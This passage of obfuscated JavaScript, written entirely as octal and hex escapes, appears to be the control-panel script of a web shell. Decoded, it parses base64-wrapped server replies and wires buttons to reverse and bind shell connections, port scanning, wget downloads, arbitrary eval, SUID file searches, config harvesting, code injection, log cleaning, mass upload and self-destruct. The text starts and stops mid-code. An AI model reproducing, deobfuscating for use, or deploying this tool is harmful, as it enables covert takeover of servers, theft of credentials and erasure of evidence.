\11\x9\151\146\x20\50\x21\x64\145\x63\162\x79\x70\x74\145\144\122\x65\163\160\x6f\x6e\163\145\x29\x20\x7b\xa\11\11\x9\x9\x9\x63\x6f\156\163\157\x6c\x65\x2e\145\x72\x72\x6f\162\x28\x27\x42\141\x73\145\x36\x34\x20\144\145\143\157\144\x69\x6e\x67\x20\146\141\x69\154\145\144\56\x20\x52\x65\x73\x70\x6f\x6e\163\145\40\154\x65\x6e\147\164\150\72\x27\54\x20\x65\156\x63\157\x64\145\144\x52\145\x73\x70\157\x6e\163\145\x2e\x6c\x65\156\x67\x74\x68\51\73\xa\x9\11\11\11\x9\143\x6f\156\x73\x6f\x6c\x65\56\x65\x72\162\157\162\50\47\x52\x65\163\x70\157\x6e\163\145\40\160\162\145\x76\x69\x65\167\72\x27\54\40\x65\156\x63\x6f\x64\x65\x64\122\145\x73\x70\x6f\156\163\145\x2e\163\165\x62\x73\x74\x72\x69\156\x67\50\60\54\40\62\x30\60\51\51\73\12\11\x9\11\11\x9\x72\x65\164\x75\x72\156\x20\173\x20\x73\164\141\164\x75\x73\72\x20\47\x65\x72\162\x6f\162\x27\x2c\40\x6d\145\x73\x73\141\x67\145\72\40\x27\x42\x61\x73\x65\x36\x34\40\144\145\143\x6f\144\x69\x6e\x67\40\x66\141\151\154\145\144\x2e\40\123\145\x72\166\x65\x72\40\155\x61\x79\x20\150\x61\x76\145\40\162\145\164\165\162\156\145\144\x20\151\x6e\x76\x61\154\151\144\x20\162\x65\x73\x70\x6f\156\163\x65\56\47\40\x7d\x3b\12\11\11\11\11\175\12\x9\x9\11\x9\x6c\145\164\x20\152\x73\157\156\x3b\12\11\x9\x9\x9\x74\162\x79\40\x7b\12\x9\11\11\11\x9\x6a\x73\x6f\156\40\75\40\112\123\117\116\x2e\160\141\162\163\x65\50\144\x65\143\162\171\x70\164\145\x64\x52\x65\x73\x70\157\156\x73\145\51\73\xa\x9\x9\x9\11\x7d\x20\143\141\164\x63\x68\40\50\160\x61\162\x73\x65\x45\x72\x72\157\x72\x29\x20\173\12\x9\x9\11\x9\x9\x63\x6f\x6e\163\157\154\x65\56\145\x72\x72\157\x72\x28\47\112\123\117\x4e\x20\x70\141\x72\x73\x65\x20\145\162\x72\157\162\x3a\x27\x2c\40\160\141\162\163\145\105\162\x72\157\162\51\73\12\x9\x9\x9\11\x9\x63\157\156\x73\157\x6c\x65\x2e\145\x72\x72\x6f\x72\50\x27\x44\x65\143\x72\x79\160\164\145\144\40\x72\145\163\160\157\x6e\163\145\72\47\54\40\144\x65\x63\162\x79\160\164\x65\144\122\x65\163\160\157\x6e\163\x65\56\x73\165\x62\163\x74\162\151\x6e\x67\50\60\x2c\40\x32\60\60\51\51\x3b\xa\11\11\x9\x9\11\162\145\x74\x75\162\156\x20\x7b\x20\163\x74\x61\x74\x75\163\72\40\47\x65\162\x72\157\162\47\54\x20\x6d\x65\163\x73\141\147\x65\x3a\x20\x27\106\x61\x69\x6c\145\144\40\x74\157\x20\160\x61\x72\163\x65\x20\x73\x65\162\166\x65\x72\40\162\x65\x73\160\157\156\x73\145\x20\x61\163\40\112\x53\x4f\116\56\x27\x20\175\73\xa\x9\11\x9\x9\x7d\12\11\x9\x9\x9\x69\x66\x20\x28\x6a\163\x6f\x6e\56\163\x74\141\164\165\x73\40\75\75\75\x20\x27\145\x72\x72\x6f\162\x27\x20\x26\x26\40\152\163\157\x6e\56\155\145\x73\x73\141\x67\x65\51\40\x7b\40\xa\x9\11\11\11\x9\164\150\151\163\x2e\x74\x6f\x61\x73\x74\x28\x6a\163\x6f\156\x2e\155\145\x73\163\x61\147\145\54\x20\47\x65\x72\162\157\162\47\x29\73\x20\12\11\11\x9\x9\175\12\x9\x9\x9\11\x72\145\x74\165\x72\x6e\x20\x6a\163\x6f\x6e\x3b\12\x9\11\11\175\x20\143\141\164\143\x68\40\50\x65\51\x20\173\xa\x9\x9\11\x9\143\x6f\x6e\x73\157\154\x65\x2e\x65\162\162\x6f\162\50\x27\x41\120\x49\x20\162\x65\161\165\145\163\x74\x20\x65\x72\162\x6f\x72\72\47\54\x20\145\x29\x3b\12\11\x9\x9\x9\x63\157\x6e\x73\x6f\x6c\145\x2e\x65\x72\162\x6f\162\50\47\101\143\x74\151\157\156\x3a\x27\x2c\40\x61\143\x74\151\x6f\156\x2c\40\x27\104\141\164\141\72\x27\x2c\x20\x64\x61\164\x61\51\x3b\12\11\x9\x9\x9\x74\150\x69\x73\56\164\x6f\141\x73\x74\50\47\101\120\x49\x20\162\145\x71\165\x65\163\x74\40\146\x61\x69\x6c\145\x64\56\x20\103\150\145\143\153\40\143\x6f\x6e\x73\x6f\x6c\145\40\146\157\162\x20\x64\145\x74\x61\x69\x6c\x73\56\47\54\40\47\x65\162\x72\x6f\x72\47\x29\73\xa\11\x9\x9\11\x72\145\x74\165\162\156\x20\173\40\x73\x74\141\x74\165\x73\x3a\40\x27\145\x72\x72\x6f\162\47\54\40\x6d\x65\x73\163\141\x67\x65\72\40\145\56\x6d\145\163\163\141\147\x65\40\174\174\x20\47\125\x6e\x6b\156\157\167\156\x20\145\162\x72\x6f\x72\x27\40\x7d\73\xa\x9\11\11\175\xa\11\x9\x7d\54\xa\x9\x9\x65\156\x63\x72\171\x70\164\72\x20\x28\144\x61\x74\x61\x29\x20\75\x3e\x20\173\xa\11\11\x9\x74\162\171\x20\x7b\xa\x9\x9\11\11\x72\145\x74\x75\162\156\x20\142\x74\157\141\50\x75\156\145\163\x63\x61\x70\x65\50\145\x6e\143\157\x64\x65\125\x52\111\x43\157\x6d\160\157\x6e\x65\156\164\50\x64\x61\x74\x61\x29\51\x29\73\12\x9\11\x9\x7d\40\x63\x61\164\143\x68\x20\50\x65\x29\40\173\12\11\x9\11\x9\143\157\x6e\163\157\154\145\x2e\145\162\162\157\x72\50\x27\x45\x6e\x63\162\x79\x70\x74\151\157\x6e\x20\x65\x72\x72\157\162\72\47\54\40\145\x29\x3b\xa\11\x9\11\x9\162\145\x74\165\x72\156\40\x62\x74\157\x61\x28\x64\x61\x74\x61\51\73\xa\11\11\x9\x7d\12\11\x9\x7d\x2c\12\11\11\x64\x65\x63\x72\171\x70\164\50\x64\x61\x74\x61\51\x20\173\xa\x9\x9\x9\151\146\x20\x28\41\144\x61\164\141\40\174\174\40\164\171\160\x65\x6f\146\40\144\141\x74\141\x20\x21\x3d\x3d\40\47\x73\x74\162\151\x6e\147\x27\x29\40\x7b\12\x9\x9\x9\x9\143\x6f\x6e\163\x6f\154\145\x2e\145\162\162\157\162\50\47\111\x6e\166\x61\154\151\x64\40\x64\141\x74\141\x20\x66\157\x72\40\144\x65\143\162\x79\160\164\x69\x6f\156\72\47\54\x20\164\x79\x70\x65\x6f\x66\x20\x64\x61\164\x61\x29\x3b\12\x9\11\11\11\x72\145\164\165\162\x6e\40\x6e\x75\154\x6c\73\xa\11\x9\11\x7d\xa\11\11\x9\x2f\57\x20\103\x6c\145\x61\x6e\x20\x74\x68\x65\40\x64\x61\164\x61\72\40\x72\x65\x6d\157\x76\145\40\167\150\151\164\x65\163\x70\x61\x63\145\x2c\x20\156\145\x77\154\151\156\x65\x73\x2c\40\141\156\x64\x20\x6f\164\x68\145\162\40\x69\156\166\x61\154\x69\144\x20\x42\x61\x73\145\66\x34\x20\143\150\141\162\141\x63\164\145\x72\x73\12\11\11\11\154\x65\x74\x20\x63\154\x65\x61\x6e\x65\144\x20\x3d\x20\144\x61\164\141\56\x74\162\151\155\x28\x29\56\x72\x65\160\x6c\141\x63\145\x28\x2f\x5b\134\x73\134\x6e\134\162\134\164\x5d\x2f\x67\x2c\x20\47\47\x29\x3b\xa\x9\11\11\x2f\57\x20\x52\x65\155\x6f\x76\145\x20\x61\156\171\x20\156\157\156\x2d\x42\141\163\145\x36\x34\40\x63\150\141\162\x61\x63\x74\145\x72\x73\40\50\142\165\164\40\x6b\x65\x65\x70\40\160\141\144\x64\x69\x6e\147\40\75\x29\12\11\x9\x9\x63\154\145\141\x6e\145\144\x20\75\x20\x63\154\x65\141\156\145\x64\x2e\162\x65\x70\x6c\x61\143\x65\50\x2f\133\136\101\55\x5a\141\55\172\x30\55\x39\53\134\x2f\x3d\135\x2f\x67\54\40\x27\47\x29\x3b\xa\11\x9\x9\x2f\57\x20\105\156\x73\165\162\x65\x20\x70\162\x6f\x70\x65\162\40\160\141\144\x64\151\156\x67\12\11\x9\11\167\x68\x69\x6c\x65\x20\x28\x63\154\145\141\x6e\x65\144\56\154\145\156\147\164\150\x20\45\40\64\x20\x21\x3d\75\x20\x30\x29\x20\173\xa\x9\11\11\x9\x63\x6c\145\141\156\145\x64\x20\53\75\x20\47\x3d\47\73\12\x9\x9\11\175\12\11\x9\11\x74\162\171\40\x7b\12\x9\x9\x9\x9\143\157\x6e\163\x74\x20\144\x65\143\157\x64\x65\x64\x20\75\40\x61\164\x6f\142\x28\143\154\x65\x61\156\x65\x64\51\x3b\xa\11\x9\x9\11\x74\162\x79\40\x7b\12\x9\x9\x9\11\11\162\x65\x74\165\162\x6e\x20\144\x65\143\x6f\144\x65\x55\x52\111\x43\x6f\x6d\x70\157\x6e\x65\x6e\x74\50\145\x73\x63\x61\160\x65\50\x64\145\143\157\x64\x65\x64\51\51\x3b\xa\11\x9\11\x9\x7d\40\143\x61\x74\x63\150\40\50\145\51\x20\173\xa\x9\11\x9\11\11\x2f\x2f\x20\111\146\40\x55\124\106\55\x38\x20\x64\145\143\157\144\145\40\x66\x61\x69\154\x73\54\40\x72\x65\x74\x75\162\x6e\40\x72\141\x77\40\144\145\x63\157\x64\145\144\12\x9\x9\x9\11\x9\x72\145\164\165\162\156\x20\144\145\x63\x6f\x64\x65\x64\x3b\xa\x9\x9\11\11\x7d\12\x9\11\11\x7d\x20\x63\141\164\x63\x68\x20\x28\x65\51\40\x7b\xa\11\x9\x9\11\x63\x6f\x6e\x73\157\x6c\x65\x2e\145\162\x72\x6f\x72\50\42\102\141\163\x65\66\x34\40\x64\x65\x63\157\x64\151\x6e\x67\40\x65\162\x72\x6f\x72\72\x22\x2c\40\x65\51\73\12\11\x9\11\11\143\x6f\156\x73\157\x6c\x65\x2e\x65\x72\162\157\162\50\42\117\x72\x69\x67\151\156\141\x6c\x20\x64\x61\164\141\40\154\x65\156\147\x74\150\72\x22\54\x20\x64\141\x74\x61\56\x6c\x65\156\147\164\150\51\73\12\x9\x9\11\11\143\x6f\x6e\x73\x6f\x6c\145\x2e\x65\162\x72\x6f\162\50\x22\103\x6c\x65\x61\156\145\x64\40\x64\x61\x74\x61\40\x6c\145\x6e\x67\164\x68\72\x22\x2c\x20\x63\x6c\145\x61\x6e\x65\x64\56\154\x65\x6e\x67\164\x68\x29\73\xa\11\11\11\11\143\x6f\x6e\x73\157\154\145\56\145\x72\x72\157\x72\50\x22\x44\x61\x74\x61\40\160\x72\145\166\151\145\x77\72\x22\x2c\x20\144\x61\x74\x61\56\x73\165\142\x73\164\x72\x69\x6e\147\x28\60\54\x20\x31\60\x30\x29\51\73\xa\x9\x9\x9\11\x63\157\x6e\x73\x6f\x6c\x65\56\145\x72\162\157\x72\x28\42\x43\x6c\145\x61\x6e\145\144\x20\x70\x72\x65\x76\x69\145\167\72\x22\54\40\x63\x6c\145\x61\x6e\x65\x64\56\163\165\x62\163\164\x72\x69\156\147\50\x30\x2c\x20\x31\x30\x30\x29\51\x3b\12\x9\x9\x9\x9\x72\x65\x74\165\162\156\40\156\x75\x6c\154\x3b\12\11\11\x9\x7d\xa\x9\x9\x7d\x2c\xa\11\11\x62\x69\x6e\144\105\166\145\156\x74\x73\x28\x29\40\173\12\11\x9\11\144\157\x63\x75\155\x65\x6e\x74\x2e\161\165\x65\x72\x79\123\145\154\145\143\164\157\x72\x41\x6c\x6c\x28\x27\56\x6e\x61\x76\55\142\x75\x74\x74\x6f\x6e\x27\x29\56\146\x6f\162\105\141\143\150\50\x65\154\40\x3d\76\40\173\x20\x65\x6c\x2e\141\x64\144\105\x76\145\x6e\164\x4c\151\163\x74\145\156\x65\162\50\x27\143\154\x69\143\x6b\x27\x2c\x20\50\51\40\x3d\76\40\x7b\x20\164\x68\151\x73\56\x6e\x61\166\x69\x67\141\x74\x65\50\145\x6c\56\144\141\164\x61\163\x65\x74\56\x76\x69\145\167\51\73\40\175\51\73\40\x7d\x29\73\12\11\x9\x9\x64\x6f\x63\x75\x6d\145\156\164\56\161\x75\145\162\x79\x53\145\x6c\x65\143\164\157\162\101\154\x6c\50\x27\x2e\x6d\x6f\144\x61\154\x20\56\x63\x6c\x6f\x73\x65\x27\x29\x2e\146\157\x72\x45\x61\x63\x68\50\x65\154\x20\x3d\x3e\x20\x65\154\56\x61\x64\x64\x45\166\145\156\x74\114\151\x73\x74\145\156\x65\x72\x28\x27\143\154\x69\x63\x6b\x27\54\x20\x28\51\x20\75\x3e\40\164\x68\x69\x73\x2e\143\x6c\x6f\163\x65\x4d\x6f\x64\x61\x6c\x28\x65\154\56\x63\x6c\x6f\x73\x65\x73\x74\x28\47\56\x6d\x6f\144\x61\x6c\x27\51\51\51\51\x3b\12\11\x9\x9\x63\x6f\x6e\x73\164\40\x73\141\x66\x65\x41\x64\x64\105\166\x65\x6e\x74\x4c\x69\163\164\145\x6e\145\162\x20\x3d\x20\50\151\x64\x2c\x20\x68\141\156\x64\x6c\145\x72\x29\40\75\76\40\173\40\143\x6f\x6e\x73\164\x20\x65\154\x20\x3d\x20\x64\157\x63\x75\x6d\145\x6e\x74\x2e\x67\x65\x74\105\154\145\x6d\x65\156\164\102\171\x49\144\50\x69\x64\51\73\x20\151\x66\x20\50\145\154\51\x20\145\x6c\x2e\x61\144\x64\105\x76\145\x6e\x74\x4c\151\x73\164\145\156\x65\162\50\47\x63\x6c\151\x63\153\x27\54\40\x68\141\156\x64\154\145\x72\x29\73\x20\x7d\x3b\xa\x9\11\x9\12\11\x9\11\57\x2f\40\x48\145\x61\144\x65\x72\40\143\x6f\x6c\x6c\x61\x70\163\145\x20\x62\165\x74\164\157\156\xa\11\11\11\143\x6f\x6e\163\x74\40\150\x65\141\x64\x65\x72\x43\x6f\154\154\141\160\163\x65\x42\164\x6e\40\75\x20\144\x6f\x63\x75\155\145\x6e\164\x2e\x67\x65\164\x45\x6c\145\155\145\156\x74\102\x79\111\144\x28\x27\x68\145\141\x64\145\162\x2d\x63\x6f\x6c\154\x61\x70\x73\x65\x2d\142\x74\156\x27\x29\73\xa\11\11\11\143\157\156\x73\164\40\163\171\x73\x74\x65\155\111\156\146\x6f\x48\145\141\144\x65\x72\40\x3d\x20\144\x6f\143\x75\155\145\156\164\x2e\x67\145\164\105\154\145\x6d\x65\156\x74\102\x79\x49\144\x28\47\x73\x79\163\164\145\x6d\55\151\156\x66\157\55\x68\145\141\144\x65\x72\x27\51\x3b\12\x9\11\11\151\x66\40\x28\x68\x65\x61\x64\x65\162\x43\157\154\154\x61\160\163\x65\102\164\x6e\x20\46\46\x20\x73\171\x73\x74\145\x6d\x49\x6e\x66\x6f\x48\145\x61\144\145\162\x29\x20\173\12\x9\11\11\x9\x68\x65\x61\144\145\162\x43\157\x6c\x6c\x61\160\x73\145\x42\164\156\56\x61\x64\144\x45\166\x65\156\164\x4c\151\x73\x74\145\x6e\x65\x72\x28\x27\x63\x6c\x69\x63\x6b\x27\54\x20\50\x65\51\x20\75\x3e\40\173\xa\x9\11\x9\x9\11\145\56\160\162\145\166\x65\x6e\x74\x44\x65\x66\x61\165\154\x74\x28\x29\73\xa\11\x9\x9\x9\x9\x65\x2e\163\164\157\x70\120\162\157\160\x61\x67\x61\164\151\x6f\156\x28\x29\73\xa\x9\x9\11\11\11\x73\171\163\x74\145\155\x49\x6e\x66\157\110\x65\141\144\145\162\x2e\x63\x6c\141\163\163\x4c\151\163\x74\x2e\x74\x6f\x67\147\x6c\x65\x28\47\143\157\x6c\154\x61\x70\x73\x65\144\x27\x29\73\12\11\x9\11\x9\11\143\x6f\156\163\x74\40\151\163\x43\x6f\154\x6c\141\x70\x73\145\x64\40\75\x20\x73\x79\163\x74\145\155\x49\156\x66\157\x48\145\x61\x64\x65\x72\x2e\x63\154\141\163\163\x4c\x69\x73\164\56\143\x6f\156\164\141\151\x6e\163\x28\47\143\x6f\x6c\154\141\160\163\145\x64\x27\51\x3b\12\x9\x9\11\x9\11\150\145\x61\x64\x65\x72\103\157\x6c\154\141\x70\x73\x65\102\x74\156\56\164\x65\x78\164\x43\157\x6e\x74\x65\x6e\x74\40\75\x20\151\x73\103\x6f\154\x6c\x61\160\163\x65\144\x20\x3f\40\47\342\x98\xb0\47\40\x3a\x20\47\xe2\x9c\x95\47\x3b\12\11\x9\11\11\11\150\x65\141\x64\145\162\x43\x6f\154\154\141\160\x73\x65\x42\x74\x6e\56\164\151\x74\154\x65\x20\75\40\x69\x73\103\157\x6c\154\x61\160\163\x65\144\x20\x3f\x20\x27\x53\150\157\167\40\x53\x79\163\x74\145\x6d\x20\111\156\146\157\47\40\72\40\x27\x48\151\144\145\x20\123\x79\163\164\145\x6d\x20\111\156\x66\x6f\47\x3b\xa\x9\11\11\11\x7d\x29\73\xa\x9\11\x9\x7d\12\11\x9\11\xa\11\x9\x9\x2f\x2f\40\x4e\x61\166\x69\x67\141\x74\x69\157\156\x20\x63\157\x6c\x6c\x61\x70\163\145\40\x62\165\x74\164\157\156\xa\x9\x9\x9\x63\x6f\x6e\163\x74\40\156\x61\x76\103\x6f\154\x6c\141\160\x73\x65\102\164\x6e\x20\75\x20\x64\x6f\x63\165\155\145\x6e\164\x2e\147\145\164\105\154\145\155\145\156\x74\x42\x79\x49\144\x28\47\x6e\x61\x76\x2d\x63\157\x6c\154\141\160\x73\x65\55\142\164\156\47\x29\73\12\11\11\11\x63\157\x6e\x73\x74\40\x74\157\x70\x4e\x61\166\142\141\x72\x20\x3d\40\144\x6f\143\x75\155\x65\156\164\56\x67\145\x74\105\154\145\155\x65\x6e\x74\102\x79\x49\144\x28\x27\x74\157\x70\x2d\x6e\x61\166\x62\141\162\47\x29\x3b\xa\11\11\x9\151\x66\40\x28\156\141\166\x43\157\x6c\154\x61\x70\x73\145\x42\x74\x6e\40\46\46\40\164\157\160\x4e\141\x76\142\x61\162\x29\x20\173\xa\11\11\x9\11\156\141\166\x43\157\x6c\x6c\141\x70\163\x65\102\164\x6e\56\x61\144\x64\105\166\145\x6e\164\114\x69\163\164\x65\x6e\x65\x72\x28\x27\x63\154\151\x63\x6b\47\x2c\40\x28\51\x20\x3d\x3e\x20\x7b\xa\11\x9\x9\x9\11\164\157\160\116\141\x76\142\x61\x72\56\x63\154\141\163\163\114\x69\x73\x74\x2e\x74\157\x67\147\154\x65\x28\47\145\x78\x70\x61\156\144\x65\144\x27\x29\x3b\12\11\x9\11\x9\11\156\141\166\x43\157\x6c\x6c\141\160\163\145\x42\164\156\56\164\x65\x78\x74\x43\157\156\x74\145\x6e\164\40\75\40\x74\157\160\x4e\141\x76\142\x61\x72\56\143\154\x61\163\x73\114\151\163\164\56\143\157\156\x74\141\x69\156\163\x28\x27\x65\170\x70\x61\x6e\144\145\144\47\51\x20\x3f\x20\47\xe2\x9c\x95\40\115\x65\156\x75\x27\40\72\x20\x27\xe2\230\xb0\x20\x4d\x65\x6e\165\47\x3b\12\x9\11\x9\x9\x7d\x29\73\xa\11\11\x9\175\xa\11\11\11\x73\141\x66\x65\x41\144\144\105\166\x65\x6e\x74\x4c\151\163\x74\145\156\x65\x72\50\47\150\157\x6d\145\x2d\163\x68\x65\154\x6c\55\142\164\156\x27\x2c\x20\50\51\40\x3d\76\40\164\150\x69\163\x2e\x6c\157\x61\x64\x46\151\154\145\x73\x28\164\x68\x69\163\56\163\150\145\154\154\137\x64\151\x72\x29\51\x3b\12\11\x9\x9\x2f\x2f\40\x4e\157\x74\x65\x3a\40\x66\x69\154\x65\x2d\x6c\151\x73\164\40\145\166\145\156\x74\x20\x68\141\156\x64\x6c\x65\x72\40\x69\163\x20\x61\x64\144\x65\144\x20\x69\156\40\x6c\x6f\x61\144\106\x69\154\x65\163\50\51\40\x74\x6f\40\160\x72\x65\x76\x65\156\x74\40\144\157\165\142\154\x65\40\142\x69\156\144\x69\156\x67\12\11\x9\x9\x73\141\146\145\x41\x64\x64\x45\x76\145\156\164\x4c\151\x73\164\x65\156\145\x72\50\47\x63\x72\x65\141\x74\x65\x2d\146\x69\154\x65\55\x62\x74\x6e\47\x2c\x20\x28\51\40\x3d\76\x20\x74\150\x69\163\56\143\162\x65\141\164\x65\x49\164\145\x6d\x28\47\x66\151\154\145\x27\x29\51\x3b\xa\40\11\x9\x9\x73\x61\146\145\x41\x64\144\105\x76\145\x6e\x74\x4c\x69\x73\164\x65\x6e\145\x72\50\47\143\162\145\141\164\x65\x2d\x64\151\162\55\x62\x74\x6e\47\x2c\x20\x28\51\x20\75\76\40\164\x68\151\163\56\143\x72\145\141\x74\x65\x49\x74\x65\155\x28\47\x64\151\x72\47\x29\51\73\xa\x20\11\x9\11\163\x61\x66\145\101\x64\x64\105\166\145\x6e\x74\x4c\151\163\164\145\x6e\145\x72\50\x27\165\160\154\157\x61\144\55\146\x69\154\x65\x2d\x69\156\x70\165\164\47\54\40\x65\40\75\x3e\x20\164\x68\x69\163\x2e\x75\160\x6c\157\x61\144\106\x69\x6c\x65\x73\50\145\x29\x29\73\xa\x20\11\11\x9\163\x61\x66\145\x41\144\144\x45\x76\145\156\x74\114\151\x73\164\145\156\145\162\50\47\x74\145\x72\155\55\x69\156\x70\x75\164\47\54\x20\x65\40\75\x3e\40\x74\x68\151\x73\x2e\x68\x61\x6e\x64\154\x65\124\145\162\x6d\151\x6e\x61\x6c\111\156\160\x75\164\x28\x65\x29\51\x3b\xa\x20\x9\x9\x9\163\141\146\x65\x41\x64\144\x45\x76\145\156\x74\x4c\x69\163\164\x65\x6e\x65\162\50\x27\163\164\x61\x72\x74\x2d\x73\x63\141\156\55\142\x74\x6e\47\x2c\x20\50\x29\40\75\x3e\40\x74\x68\151\163\x2e\163\x74\x61\x72\164\x50\157\162\164\123\143\x61\x6e\x28\x29\51\73\xa\40\11\11\x9\x73\x61\x66\x65\x41\144\144\x45\x76\145\x6e\164\x4c\x69\163\164\145\156\145\162\50\x27\x72\x75\x6e\55\x65\166\x61\x6c\55\x62\164\156\x27\54\x20\x28\51\40\x3d\76\x20\164\x68\151\163\x2e\162\165\x6e\105\x76\141\154\x28\51\x29\73\12\x20\x9\11\11\x73\141\x66\x65\101\144\144\x45\x76\145\156\x74\114\151\163\164\x65\156\145\162\x28\x27\x77\147\145\164\x2d\142\x74\156\47\54\40\50\x29\x20\75\x3e\40\x74\x68\x69\x73\56\162\x75\x6e\127\147\145\164\50\51\x29\73\xa\40\11\x9\11\x73\x61\146\145\x41\x64\x64\x45\166\145\x6e\164\x4c\x69\x73\164\145\x6e\x65\x72\50\47\x73\145\154\x66\x2d\x64\x65\x73\x74\x72\165\x63\164\55\x62\x74\156\47\x2c\40\x28\51\40\x3d\76\40\x74\x68\x69\163\56\x73\145\x6c\x66\x44\x65\163\164\x72\x75\x63\x74\50\51\51\73\xa\40\11\11\x9\x73\x61\146\145\101\x64\x64\x45\x76\x65\x6e\x74\114\x69\x73\x74\x65\156\145\x72\x28\47\x6d\141\163\163\x2d\165\x70\x6c\157\x61\144\55\142\x74\x6e\x27\x2c\40\x28\x29\40\75\x3e\x20\164\150\x69\x73\x2e\x72\x75\156\115\141\163\163\x55\160\x6c\157\141\144\x28\51\x29\73\xa\40\11\11\11\x73\141\x66\145\x41\x64\144\105\166\145\x6e\x74\114\x69\163\x74\x65\156\x65\162\50\x27\x66\x69\x6e\144\x2d\163\x75\151\x64\x2d\147\x75\x69\144\x2d\142\x74\x6e\47\x2c\40\50\51\40\75\x3e\40\164\x68\x69\163\x2e\146\151\156\144\x53\x75\x69\x64\107\165\x69\144\106\151\x6c\145\163\x28\51\51\x3b\xa\40\x9\11\11\163\141\146\145\101\144\144\x45\x76\145\x6e\164\x4c\151\x73\x74\145\156\x65\162\x28\x27\162\165\x6e\55\x64\142\x2d\161\165\145\162\171\x2d\142\164\156\x27\x2c\40\50\51\x20\75\x3e\x20\x74\150\151\163\56\x72\x75\156\104\x62\121\x75\145\x72\171\50\x29\51\73\12\40\x9\11\x9\163\x61\146\145\x41\x64\144\105\x76\x65\x6e\x74\114\x69\x73\x74\145\156\x65\x72\50\x27\143\x6f\156\x6e\145\143\164\x2d\162\x65\166\x2d\x73\150\145\154\x6c\55\x62\x74\156\47\54\40\x28\x29\x20\75\76\x20\x74\x68\151\x73\56\143\157\x6e\x6e\145\143\164\122\x65\166\145\162\x73\x65\123\150\x65\x6c\x6c\x28\51\51\73\12\x20\x9\11\11\163\141\x66\145\101\144\x64\x45\x76\145\x6e\x74\114\x69\x73\x74\x65\x6e\x65\x72\x28\x27\143\157\x6e\x6e\x65\x63\x74\55\142\x69\x6e\x64\55\x73\150\x65\x6c\154\x2d\x62\164\x6e\47\54\x20\50\x29\x20\75\x3e\40\164\150\151\x73\x2e\143\x6f\x6e\x6e\x65\143\x74\102\151\x6e\144\x53\150\x65\154\154\50\51\x29\73\12\x20\x9\11\11\x73\x61\x66\x65\x41\x64\144\105\x76\145\156\x74\x4c\x69\x73\164\x65\156\x65\162\50\x27\x73\164\141\162\x74\x2d\163\145\x61\162\143\150\x2d\x62\x74\156\47\x2c\x20\50\51\x20\x3d\76\x20\164\150\x69\163\56\x73\145\141\x72\143\x68\x46\151\154\x65\x73\50\51\x29\x3b\12\x20\11\11\11\x73\x61\x66\x65\101\x64\x64\x45\166\x65\x6e\164\x4c\x69\163\x74\145\x6e\x65\162\50\x27\x73\141\x76\x65\x2d\143\162\157\156\x2d\x62\x74\x6e\47\x2c\40\x28\x29\x20\75\x3e\40\x74\x68\151\x73\x2e\x73\141\166\x65\x43\162\157\156\50\x29\51\73\xa\x20\x9\x9\11\x73\x61\146\145\101\144\144\105\x76\145\156\164\x4c\x69\x73\164\x65\156\145\162\x28\47\147\145\x74\55\165\x73\145\x72\163\55\147\x72\x6f\x75\160\x73\55\142\164\156\x27\54\40\50\51\40\x3d\76\x20\164\x68\x69\x73\56\147\145\x74\125\163\x65\162\x73\x41\x6e\144\x47\162\x6f\x75\160\x73\x28\x29\x29\73\12\40\x9\11\11\163\x61\x66\x65\101\144\x64\105\x76\x65\156\x74\x4c\151\163\164\x65\x6e\145\162\x28\47\x67\145\164\x2d\153\145\162\156\x65\x6c\55\151\x6e\x66\x6f\x2d\142\164\x6e\47\54\40\x28\x29\x20\75\76\40\164\x68\151\x73\x2e\147\x65\x74\113\x65\162\x6e\145\154\111\156\x66\157\x28\x29\51\x3b\12\40\11\11\11\163\x61\x66\x65\x41\x64\144\105\166\x65\156\x74\114\151\163\164\x65\x6e\145\x72\50\47\163\164\x61\x72\164\x2d\x63\157\x6e\x74\x65\156\x74\x2d\x73\145\x61\162\143\150\55\x62\x74\156\x27\x2c\x20\x28\x29\40\75\x3e\x20\x74\x68\151\x73\x2e\x73\145\141\x72\x63\x68\x43\x6f\156\x74\145\156\x74\50\51\51\x3b\xa\x20\x9\11\x9\163\x61\x66\145\101\x64\x64\x45\166\x65\x6e\164\x4c\x69\x73\164\145\x6e\145\x72\50\47\147\x65\x74\55\143\157\x6e\x66\x69\x67\163\x2d\x62\x74\x6e\47\x2c\x20\x28\x29\40\x3d\76\x20\x74\150\x69\163\x2e\147\x65\x74\x43\157\156\x66\x69\147\x73\x28\x29\x29\x3b\xa\40\x9\11\11\x73\141\x66\x65\101\x64\144\105\166\145\156\x74\x4c\151\x73\x74\145\156\x65\x72\x28\x27\151\156\x6a\145\x63\x74\x2d\x63\x6f\x64\x65\x2d\142\x74\x6e\47\x2c\x20\50\x29\40\75\76\40\164\150\x69\163\x2e\x69\156\152\x65\x63\164\103\x6f\x64\145\x28\51\x29\x3b\12\40\11\x9\11\163\x61\146\145\101\144\144\x45\166\x65\156\x74\x4c\x69\x73\164\x65\156\x65\x72\x28\x27\x6c\x6f\x67\55\143\154\145\x61\156\145\x72\x2d\142\x74\x6e\47\x2c\x20\x28\51\x20\75\x3e\40\164\x68\x69\x73\x2e\x63\154\x65\141\156\x4c\157\x67\x28\x29\51\x3b\xa\x20\x9\x9\11\x64\x6f\x63\165\155\x65\156\x74\56\x71\165\145\x72\x79\x53\x65\x6c\145\x63\164\x6f\162\101\154\x6c\50\x27\56\164\141\142\x2d\154\151\x6e\153\47\51\56\x66\157\162\x45\x61\143\x68\x28\164\141\142\x20\75\x3e\40\173\x20\x74\141\142\56\x61\x64\144\105\166\x65\156\164\114\151\x73\x74\x65\x6e\x65\x72\50\47\x63\x6c\151\x63\153\x27\x2c\40\50\x65\51\40\75\x3e\x20\x7b\40\x63\x6f\156\163\x74\x20\x74\141\x72\x67\145\x74\124\141\x62\x20\x3d\x20\145\56\x74\141\162\147\145\164\x2e\x64\x61\164\141\x73\x65\x74\56\x74\141\142\73\x20\143\157\156\x73\x74\40\x74\141\142\163\x43\157\156\164\141\151\x6e\x65\x72\40\x3d\40\145\56\164\141\x72\147\x65\x74\x2e\x63\154\x6f\x73\145\163\x74\50\47\56\164\x61\x62\163\47\x29\73\x20\x63\157\x6e\163\x74\x20\166\x69\x65\167\103\157\x6e\x74\x61\151\x6e\145\x72\x20\x3d\x20\x65\56\164\141\x72\x67\145\x74\56\143\x6c\157\x73\x65\163\164\50\x27\56\166\151\145\x77\x2d\143\157\x6e\164\141\x69\156\145\162\x27\x29\x3b\40\x69\x66\x20\x28\164\x61\x62\x73\x43\157\156\x74\x61\151\x6e\145\162\40\46\46\40\x76\151\145\167\103\x6f\x6e\164\141\151\156\x65\162\x29\x20\x7b\x20\x74\141\x62\163\x43\157\x6e\164\141\151\x6e\x65\162\56\x71\x75\145\x